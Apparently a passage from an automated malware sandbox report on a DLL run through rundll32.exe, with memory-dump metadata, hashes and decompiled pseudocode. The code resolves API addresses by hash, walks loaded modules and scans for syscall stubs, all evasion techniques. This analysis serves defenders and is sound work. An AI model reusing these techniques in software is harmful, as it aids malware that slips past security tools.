0x6e71998f
0x6e719971
0x6e719975
0x00000000
0x6e719975
0x6e71990f
0x6e71993b
0x6e719953
0x6e719957
0x6e71995a
0x6e71995d
0x6e71995f
0x6e719962
0x6e71993d
0x6e71993d
0x6e719941
0x6e719944
0x6e719947
0x6e71994a
0x6e71994d
0x6e71994d
0x00000000
0x6e71993b
0x6e719915
0x00000000
0x00000000
0x6e71991b
0x6e71991f
0x6e719925
0x6e719928
0x6e71992b
0x6e71992e
0x00000000
0x6e71992e
0x6e7197a6
0x6e7197aa
0x6e7197b0
0x00000000
0x6e7197b0
0x6e7196e8
0x6e7196fa
0x6e7196ff
0x6e71976a
0x00000000
0x00000000
0x6e719771
0x6e719797
0x6e71979b
0x00000000
0x00000000
0x6e71977a
0x6e71977f
0x6e719793
0x00000000
0x00000000
0x00000000
0x6e719795
0x6e719786
0x00000000
0x00000000
0x6e71978b
0x00000000
0x00000000
0x6e71978d
0x00000000
0x6e719771
0x6e719701
0x6e71970b
0x6e71971c
0x6e71971f
0x6e719722
0x6e719728
0x00000000
0x00000000
0x00000000
0x00000000
0x6e71972e
0x6e71972e
0x6e71972e
0x6e719735
0x00000000
0x00000000
0x6e719737
0x6e71973a
0x6e719740
0x00000000
0x00000000
0x00000000
0x6e719742
0x6e719744
0x6e71974d
0x00000000
0x00000000
0x6e719761
0x00000000
0x00000000
0x00000000
0x6e719763
0x6e7196ef
0x00000000
0x00000000
0x00000000
0x6e7196f5
0x6e719689
0x6e7196b8
0x6e7196b9
0x6e7196c2
0x00000000
0x6e7196d3
0x00000000
0x6e7196d3
0x6e719690
0x6e719693
0x6e7196a6
0x6e7196a7
0x6e7196ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e719693
0x6e719689
0x6e719615
0x6e719672
0x6e719676
0x6e71967c
0x00000000
0x6e71967c
0x6e719617
0x6e71961b
0x6e719628
0x6e71962c
0x6e719642
0x6e71964a
0x6e71962e
0x6e719630
0x6e71963a
0x6e71963a
0x6e719650
0x6e719659
0x6e719670
0x00000000
0x00000000
0x00000000
0x6e719670
0x6e71965b
0x6e71965b
0x00000000
0x6e719650

Strings

, xrefs: 6E7199DB

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction ID: d318b9be1abc36cc44cf4e32d7e8d4ea0b65dec30bfb1ada3aa81a4248281747
Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction Fuzzy Hash: DA22A03040C3968FD754CF55C5A13AABBE0BFA6300F08886EE9E55B2A5D335D946CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E71143C, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6E71143C(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6E710304(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6e71d208 == 0 ||  *0x6e71d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6E714FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6e71d2f0 |  *0x6e71d2f1;
									if(( *0x6e71d2f0 |  *0x6e71d2f1) == 0) {
										_t525 =  *0x6e71d208; // 0xf01340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6e71d2f0 = 1;
											_t526 = E6E71361C(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6E711C30(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6e71d208 = _t526;
											 *0x6e71d2f0 = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6E71361C(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6E711C30(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6E70DFC0(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6E70DFC0(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x1c6ef387;
									if(_t535[0x54] == 0x1c6ef387) {
										 *0x6e71d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x45b68b68;
										if(_t535[0x54] == 0x45b68b68) {
											 *0x6e71d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6E70E8A8( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6E71306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6e71d2e4 = 1;
					E6E70F584( &(_t535[0x38]), 0);
					E6E70F584( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6E70F4BC( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6E71306C(0x60a28c5c, 0xe7942190, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6E70F828( &(_t535[0xc]), E6E70F4CC( &(_t535[8])) + 0x14);
								_t369 = E6E70F4BC( &(_t535[0xc]), E6E70F4CC( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6E70F654( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6E70F584( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6E70F654( &(_t535[8]));
							E6E70F654( &(_t535[0x164]));
							E6E70F584( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6E70F584( &(_t535[0x20]), 0);
							_push(0x60a28c5c);
							_t289 = E6E711D34(0x60a28c5c);
							_t290 = E6E7112EC( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6E711C6C( &(_t535[0x164]), 0x60a28c5c);
							_t518 =  &(_t535[0x178]);
							E6E70D014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6E715CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6E715D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6E718E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6E70F654( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6E70BB44( &(_t535[0x110]));
							}
							E6E70CFDC( &(_t535[0x104]));
							E6E70CFDC(_t518);
							E6E70CFDC( &(_t535[0x15c]));
							E6E70CFDC( &(_t535[0x154]));
							E6E7190EC( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6E70F618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6E7190B0( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6E70F4BC( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6E70F4CC( &(_t535[0x44]));
								_t519 =  *(0x6e71bd40 + _t381 * 4);
								_t531 = E6E71907C( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6E7187E8( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6E70F4CC( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6E70F4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6E70F4CC( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6E70F828( &(_t535[0x20]), E6E70F4CC( &(_t535[0x1c])) + 8);
										E6E70F4BC( &(_t535[0x20]), E6E70F4CC( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6E71317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6E70F828( &(_t535[0x48]), _t535[0x70]);
									E6E71317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6E70F840( &(_t535[0x44]), _t563);
									E6E70F840( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6E71913C( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6E719104( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6E70F654( &(_t535[0x144]));
									E6E70F654( &(_t535[0x134]));
									goto L38;
								}
								 *0x6e71d2ec =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6E70F654( &(_t535[0x11c]));
							E6E718E68(_t381,  &(_t535[0xd8]));
							E6E70F654( &(_t535[0x1c]));
							E6E70F654( &(_t535[0x44]));
							E6E70F654( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6E70F4BC( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6E70F828( &(_t535[0x38]), E6E70F4CC( &(_t535[0x34])) + 0x14);
							_t347 = E6E70F4BC( &(_t535[0x38]), E6E70F4CC( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6E70F4BC( &(_t535[0xc]), _t62);
						_t455 = E6E70F4BC( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6e711448
0x6e71144f
0x6e711452
0x6e711459
0x6e711bdb
0x6e711bdb
0x6e71145f
0x6e71146a
0x6e7119a9
0x6e7119ad
0x00000000
0x6e711c2c
0x6e7119b3
0x6e7119b6
0x6e7119b9
0x6e7119c3
0x6e7119d2
0x6e7119d4
0x6e7119db
0x6e711bc5
0x6e711bc7
0x6e711bca
0x6e711bce
0x00000000
0x6e711bce
0x6e7119ea
0x6e7119f5
0x6e7119fc
0x6e7119ff
0x6e711a01
0x6e711a04
0x6e711a07
0x6e711a0d
0x6e711a1b
0x6e711a2b
0x6e711a50
0x6e711a61
0x6e711a64
0x6e711a66
0x6e711aca
0x6e711acd
0x6e711acd
0x6e711acf
0x6e711ad2
0x6e711ad6
0x6e711ad6
0x6e711ada
0x00000000
0x00000000
0x6e711ae7
0x6e711aed
0x6e711b21
0x6e711b27
0x6e711b29
0x6e711bf8
0x6e711c00
0x6e711c03
0x6e711c05
0x6e711c1c
0x6e711c1c
0x6e711c07
0x6e711c0b
0x6e711c10
0x6e711c10
0x6e711c1e
0x6e711c24
0x6e711b43
0x6e711b43
0x6e711b45
0x6e711b45
0x6e711b47
0x6e711b47
0x6e711b4c
0x00000000
0x00000000
0x6e711b4e
0x6e711b4f
0x6e711b52
0x6e711b55
0x00000000
0x00000000
0x6e711b61
0x6e711b64
0x6e711b66
0x6e711b7d
0x6e711b7d
0x6e711b68
0x6e711b6c
0x6e711b71
0x6e711b71
0x6e711b8a
0x6e711b8d
0x6e711b96
0x6e711b99
0x6e711bbc
0x6e711bc0
0x00000000
0x6e711bc0
0x6e711ba1
0x6e711ba1
0x6e711bad
0x6e711bb0
0x6e711bb9
0x00000000
0x6e711bb9
0x6e711b2f
0x6e711b3f
0x6e711b3f
0x6e711b41
0x00000000
0x00000000
0x6e711b37
0x6e711b39
0x6e711b39
0x00000000
0x6e711b3f
0x6e711aef
0x6e711af7
0x6e711b17
0x6e711af9
0x6e711af9
0x6e711b01
0x6e711b0a
0x6e711b0a
0x6e711b01
0x00000000
0x6e711af7
0x6e711a68
0x6e711a6f
0x00000000
0x00000000
0x6e711a7c
0x6e711a82
0x6e711a87
0x6e711a8e
0x6e711a92
0x6e711aa7
0x6e711aa9
0x6e711aab
0x6e711ab1
0x6e711abf
0x6e711abf
0x6e711ac5
0x00000000
0x6e711ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x6e711a0f
0x6e711a0f
0x6e711a0f
0x6e711a10
0x6e711a13
0x6e711a17
0x00000000
0x6e711a2d
0x6e711a30
0x6e711a33
0x6e711a3c
0x6e711a3f
0x6e711a40
0x6e711a42
0x00000000
0x6e71147d
0x6e71147f
0x6e711484
0x6e71148f
0x6e71149d
0x6e7114b0
0x6e7114bd
0x6e7114c6
0x6e7114ca
0x6e7114ce
0x6e711516
0x6e711516
0x6e711518
0x6e71151f
0x00000000
0x00000000
0x6e711538
0x6e711540
0x6e711544
0x6e711559
0x6e71155d
0x6e711561
0x6e71156a
0x6e711570
0x6e711573
0x6e711577
0x6e71157f
0x6e711581
0x6e711585
0x6e71158c
0x6e711595
0x6e711595
0x6e711599
0x6e7115ae
0x6e7115c4
0x6e7115d1
0x6e7115d2
0x6e7115d2
0x6e7115d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e71158e
0x6e71158e
0x6e71158e
0x6e71158f
0x6e711590
0x00000000
0x6e71158e
0x6e711553
0x6e711557
0x00000000
0x00000000
0x00000000
0x6e7115d8
0x6e7115d8
0x6e7115d9
0x6e7115dc
0x6e7115e6
0x6e7115e6
0x6e7115ea
0x6e7115f1
0x6e71164c
0x6e711651
0x6e7116a4
0x6e7116a4
0x6e7116a8
0x6e7116ac
0x6e7114d6
0x6e7114d9
0x6e7114de
0x6e7114e4
0x6e7114e7
0x6e7114ee
0x6e7114f2
0x6e7114f9
0x6e711502
0x6e711506
0x6e71150a
0x6e711510
0x00000000
0x00000000
0x00000000
0x6e711510
0x6e7116b6
0x6e7116c2
0x6e7116cd
0x6e7116d4
0x6e7116dd
0x6e7116e7
0x6e7116e8
0x6e7116f6
0x6e7116fb
0x6e7116fc
0x6e711709
0x6e71170e
0x6e711720
0x6e711725
0x6e71172a
0x6e71173c
0x6e71174e
0x6e711753
0x6e71175e
0x6e711765
0x6e71176a
0x6e711772
0x6e71177b
0x6e71177b
0x6e711787
0x6e71178e
0x6e71179a
0x6e7117a6
0x6e7117b4
0x6e7117c5
0x6e7117cc
0x6e7117d1
0x6e7117da
0x6e7117df
0x6e7117e1
0x6e7117e5
0x6e7117e9
0x6e7117f6
0x6e711803
0x6e711807
0x6e71181b
0x6e71181f
0x00000000
0x00000000
0x6e711834
0x6e711836
0x6e71183e
0x6e71183b
0x6e71183b
0x6e71183b
0x6e711842
0x6e711844
0x6e71184a
0x6e711850
0x6e7118ac
0x6e7118b5
0x6e7118b9
0x6e7118c6
0x6e7118cf
0x6e7118d4
0x6e7118d8
0x6e7118db
0x6e71193c
0x6e711952
0x6e71195d
0x6e71195e
0x6e71195f
0x6e711963
0x6e711966
0x6e711be6
0x6e711be9
0x6e711be9
0x00000000
0x6e711966
0x6e7118e5
0x6e7118f5
0x6e7118fe
0x6e711907
0x6e711910
0x6e711911
0x6e711912
0x6e711917
0x6e71191f
0x6e711927
0x00000000
0x00000000
0x00000000
0x6e711929
0x6e711859
0x6e71185e
0x6e711862
0x6e711862
0x6e711866
0x6e711869
0x00000000
0x00000000
0x6e71188a
0x6e71188c
0x6e711890
0x6e711892
0x00000000
0x00000000
0x6e711894
0x6e71189b
0x6e7118a7
0x00000000
0x6e7118a7
0x6e71186e
0x00000000
0x6e71196c
0x6e71196c
0x6e71196d
0x6e71197d
0x6e711989
0x6e711992
0x6e71199b
0x6e7119a4
0x00000000
0x6e7119a4
0x6e711653
0x6e711655
0x6e711657
0x6e71165c
0x6e711661
0x6e711674
0x6e71168a
0x6e711693
0x6e711694
0x6e711694
0x6e711696
0x6e711697
0x6e71169a
0x6e71169e
0x00000000
0x6e711657
0x6e7115f3
0x6e7115fd
0x6e7115fe
0x6e7115fe
0x6e71160b
0x6e711617
0x6e711619
0x6e71161b
0x6e71161f
0x6e71162f
0x6e71162f
0x6e711636
0x6e711639
0x6e71163a
0x6e71163e
0x6e711648
0x00000000
0x6e711648

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3449b98992fbc9ad13e9ba2d12e1fa8fea6d8da945888af40aa148498578110d
Instruction ID: 4eaf3cdaba38b4fd6985cc75216defe7c4e1fd468eb36fc912194358b5ef60c2
Opcode Fuzzy Hash: 3449b98992fbc9ad13e9ba2d12e1fa8fea6d8da945888af40aa148498578110d
Instruction Fuzzy Hash: 8B329C701083418FC754DFA4CA94ADAB7E8BFA4304F188D2DE5958B2B1EB70E949CF52

Uniqueness

Uniqueness Score: -1.00%

Function 6E706D0C, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E706D0C() {

				 *0x6e71d280 = GetUserNameW;
				 *0x6E71D284 = MessageBoxW;
				 *0x6E71D288 = GetLastError;
				 *0x6E71D28C = CreateFileA;
				 *0x6E71D290 = DebugBreak;
				 *0x6E71D294 = FlushFileBuffers;
				 *0x6E71D298 = FreeEnvironmentStringsA;
				 *0x6E71D29C = GetConsoleOutputCP;
				 *0x6E71D2A0 = GetEnvironmentStrings;
				 *0x6E71D2A4 = GetLocaleInfoA;
				 *0x6E71D2A8 = GetStartupInfoA;
				 *0x6E71D2AC = GetStringTypeA;
				 *0x6E71D2B0 = HeapValidate;
				 *0x6E71D2B4 = IsBadReadPtr;
				 *0x6E71D2B8 = LCMapStringA;
				 *0x6E71D2BC = LoadLibraryA;
				 *0x6E71D2C0 = OutputDebugStringA;
				return 0x6e71d280;
			}

0x6e706d1d
0x6e706d25
0x6e706d28
0x6e706d37
0x6e706d3a
0x6e706d49
0x6e706d4c
0x6e706d5b
0x6e706d5e
0x6e706d6d
0x6e706d70
0x6e706d7f
0x6e706d82
0x6e706d91
0x6e706d94
0x6e706da3
0x6e706da6
0x6e706da9

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1d8509a79ec31cb0ba47a1efc50f15722bde6692d6a731e022bc549c8d0b0de
Instruction ID: 201baf180107ab994fec9aea0f521eba584488616265dc5ce546f0b3249563b0
Opcode Fuzzy Hash: c1d8509a79ec31cb0ba47a1efc50f15722bde6692d6a731e022bc549c8d0b0de
Instruction Fuzzy Hash: 6211E3B8A15B00CF8749CF05E2918917BF5BB8D35031A81BED8098BB66E734D949CF54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 484 Parent PID: 6932 rundll32.exeCOMMON

Executed Functions

Function 00BA2092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00BA2092(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				void* _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				int _v156;
				char* _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t140;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t183;
				intOrPtr _t226;
				void* _t233;
				intOrPtr _t236;
				void* _t243;
				intOrPtr* _t247;
				unsigned int _t250;
				intOrPtr _t259;
				DWORD* _t271;
				void* _t275;
				intOrPtr* _t278;
				intOrPtr* _t279;

				_t140 = _a4;
				_v20 = 0;
				_t243 =  *((intOrPtr*)(_t140 + 0x44));
				 *0xba4418 = 1;
				asm("movaps xmm0, [0xba3010]");
				asm("movups [0xba4428], xmm0");
				_v48 = _t140;
				_v52 =  *((intOrPtr*)(_t140 + 0x48));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v188 = _t243;
				_v184 =  *((intOrPtr*)(_v48 + 0x58));
				_v180 = 4;
				_v176 =  &_v20;
				_v60 =  *((intOrPtr*)(_t140 + 0x54));
